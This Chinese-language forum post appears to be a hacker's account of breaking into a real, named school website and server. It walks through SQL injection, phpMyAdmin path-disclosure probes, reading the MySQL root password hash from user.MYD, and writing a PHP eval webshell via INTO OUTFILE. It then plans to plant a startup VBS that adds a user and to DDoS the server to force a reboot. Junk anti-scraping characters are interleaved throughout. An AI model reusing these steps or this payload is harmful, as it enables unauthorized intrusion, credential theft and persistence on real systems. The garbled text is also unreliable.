第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏5 b" H1 r/ j) R- w8 m
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!: v) {; P/ Y! x0 \( s U5 B F
7 r! C9 {# g( V+ y' K
6 n) A. l( [2 F( { [( |1 g* Q4 h: K* e7 J6 a9 W
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 % \: G$ G. v4 W$ k" d/ [
, [+ j7 `; | W+ _0 @) Z1 P那么想可以直接写入shell ,getshell有几个条件:
1 o2 ?7 {& I; _8 C2 `( K4 E; y1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF , t, r8 p* R: Z- ?* h
7 ?( N3 m6 t y8 V/ g
试着爆绝对路径:
8 P0 p' p6 K0 k1 ~! N( Y: Z- p1./phpMyAdmin/index.php?lang[]=1 # r l$ H9 U3 p+ P/ p/ r! y
2./phpMyAdmin/phpinfo.php " e, v; J- q1 |* ]- ^% l
3./load_file()
0 L7 D; {3 C% Y3 k' t3 v5 c" s4./phpmyadmin/themes/darkblue_orange/layout.inc.php , |) S* Y( S0 u0 }2 `5 B: G
5./phpmyadmin/libraries/select_lang.lib.php ; J" l- f5 G4 |3 k6 N
6./phpmyadmin/libraries/lect_lang.lib.php 7 G6 s# j8 Z: B3 O* j$ q6 L
7./phpmyadmin/libraries/mcrypt.lib.php , i4 @# Q" c' l
8./phpmyadmin/libraries/export/xls.php ) w8 i) S% Z. q+ b8 }5 }7 ^
* ~' M I8 f8 |% K# u2 d均不行...........................
0 Z5 x, U5 M$ F# Y' P) A# Y4 f# S. }4 | `* m
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
7 L5 H) z# `' g3 H3 l# H
- p+ [7 j( h2 C+ ?. Q权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
1 c! K2 t5 U8 r% Y. z* a* I* t b% \& `/ g8 _9 Z
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
& n2 O( w& |( C) h; t6 v% O7 T2 K6 e5 K) W. P& A
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
) C: f$ Z# a% d/ ~7 m9 k0 a4 r2 U
4 t! \# p9 C0 h$ I2 C想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
3 @! {! h( F* p! z4 s- e5 h- O. n* ~ e3 q
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 9 Z8 \' B1 P7 P
! a3 A9 q4 c1 F$ I- S' e$ Y& z. o
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
# g7 i2 q' e" f% S* J
$ M4 t" g+ k) _9 c8 t成功读到root密码:
% ?) ~5 D' @( o. S; r/ [* m2 |- E, }/ s( G
17---- r(0072)
9 m$ @. }( T5 d( f2 r6 J18---- o(006f) 8 ~8 ~: Q1 |% `
19---- o(006f) 2 v* F) J" n* w7 i0 s
20---- t(0074)
2 X3 W* o# d6 Q7 C5 W8 k21---- *(002a) ! H6 Z0 X% i+ N+ x! w5 L4 L' I5 D6 N
22---- 8(0038)
7 {2 L/ u2 x* \5 p) r) r4 l- K: P23---- 2(0032)
3 l2 S) {) B6 T7 [: {/ z24---- E(0045) . W' b9 y1 {: c) O! U; P+ g
25---- 1(0031) 7 W" B5 P+ K j4 u
26---- C(0043) : C+ ?$ v% y: X0 v" Q% \* |
27---- 5(0035) % U# |* n L) h2 A6 S* j0 V
28---- 8(0038) 7 U* p+ x& ~3 `& w( C0 Q! F
29---- 2(0032)
8 k0 O/ R) T6 v i/ A8 @30---- 8(0038)
$ y% {" F& C5 D5 b. \5 L31---- A(0041)
; }* k/ u; d1 _: g2 Y/ P! C32---- 9(0039) 3 s+ `1 N3 O- [4 _8 v
33---- B(0042) 3 g8 o2 b6 [+ D
34---- 5(0035)
/ }) V6 C. j! i6 v35---- 4(0034) 0 m+ A* {2 n7 F. M
36---- 8(0038) ! ]8 R/ I2 H7 h6 H
37---- 6(0036) " J" x) s" E1 v i, U3 {4 F& L
38---- 4(0034)
/ p. @$ {8 r$ R8 j; n, o39---- 9(0039)
; ?9 d5 n; y5 }% e' y40---- 1(0031)
, ~- L" h4 a! h% G" F41---- 1(0031) 1 t, l$ i/ C* A) z- m1 D
42---- 5(0035) `; s# V9 k9 K; @( C! ~/ y
43---- 3(0033) & E' ^% O& l; q/ Y0 h% Q
44---- 5(0035)
4 h: z' T$ j: M3 H45---- 9(0039)
" \; Q. q% I3 T" A9 `/ K7 c( {' x3 W46---- 8(0038) \6 V( Y$ c1 T, d5 W! i
47---- F(0046) 7 R D9 {5 z7 v; e+ o% W- L, U
48---- F(0046) 5 ~. j: n# {6 l7 [$ n# {
49---- 4(0034)
& v/ ~+ D) ^- U" L5 ~50---- F(0046) % ?! t/ I% S m1 B0 p: D4 ~
51---- 0(0030)
4 h& I7 [9 E0 h: p. J- q% q5 m' Y4 X52---- 3(0033)
: x9 i" \8 E- |4 ^1 p53---- 2(0032)
6 e: ? k+ Z. f, x54---- A(0041)
/ F/ o; _; k O- v( N55---- 4(0034)
3 h0 W6 _: w# h; P. L: D; U56---- A(0041)
' e: e/ P8 [' Q1 X0 M- U, g57---- B(0042) 4 x+ S( r5 z. j
58---- *(0044)
9 H: J" ^* j6 s$ [" w! H+ a59---- *(0035) " [6 D! }9 P- Z
60---- *(0041)
$ g/ ~$ |" O' D) h- K' @- R, D61---- *0032)
3 r6 w3 n- ?# h# n' p4 { g9 K3 I# T! d% j
解密后成功登陆phpmyamin
4 D4 L" [3 O9 b7 ~# g M- U, s# r - l2 _+ N$ t# T( d0 D
4 x B# D7 W* t, f, z2 H4 _9 P0 n, N
+ U! ]# k/ P! ]. _2 ?& \& ?% ~5 q
6 P2 V3 d# a& f3 Y- c. e, \找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
+ T6 p5 n3 C7 ]0 I5 U( e0 U0 B( K- L( P
成功执行,拿下shell,菜刀连接:
( S; D7 d4 K8 I- f, p8 F8 n
; j- K; j2 M x* Q9 F( v7 z5 j* ]服务器不支持asp,aspx,php提权无果...................
+ A7 R( B. a# [7 {
3 Q, ?; E6 E6 U但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 5 G1 U" Y- q% J0 @ J9 E
服务器上已经有个隐藏帐号了
# b: _) R( y0 W9 c2 H/ r; I别名 administrators r/ h6 Y/ F4 o2 c
注释 管理员对计算机/域有不受限制的完全访问权 9 E5 r0 Y' o' {6 y7 X# |" H
成员
: V* d% D* X; m( L- K-------------------------------------------------------------------------------3 I: @+ q7 v: Z" q3 O6 y& `
admin
0 t8 e; n( S3 F9 T" c2 x" m' K' J/ yAdministrator
) K$ K" n. @' I' Z# f* T- ^slipper$
3 c0 Y) G) V: z1 A& Z6 T+ B, Jsqluser% u: R" P: d8 @- G* l; X: J- N
命令成功完成。
2 Y7 Y7 X- O" |! Y x5 u0 V: Z: Y' W6 e6 }! X
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
; E( |" X6 ~$ ?) h, R# E. ]' w; y
ddos服务器重启,不然就只能坐等服务器重启了...............................
4 H; L. c2 x+ h
: L/ ~3 G: `! @0 G: `7 g* f6 h7 Y % a/ N# A2 i5 q$ \" @% A
|